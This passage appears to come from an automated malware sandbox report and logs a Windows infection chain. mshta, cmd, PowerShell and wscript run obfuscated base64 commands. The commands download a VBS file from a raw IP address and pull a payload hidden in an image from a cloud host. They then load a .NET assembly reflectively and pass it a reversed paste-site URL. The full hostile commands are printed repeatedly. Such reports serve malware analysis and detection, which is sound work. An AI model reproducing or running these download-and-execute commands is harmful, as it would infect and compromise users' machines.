R0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $AngelJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
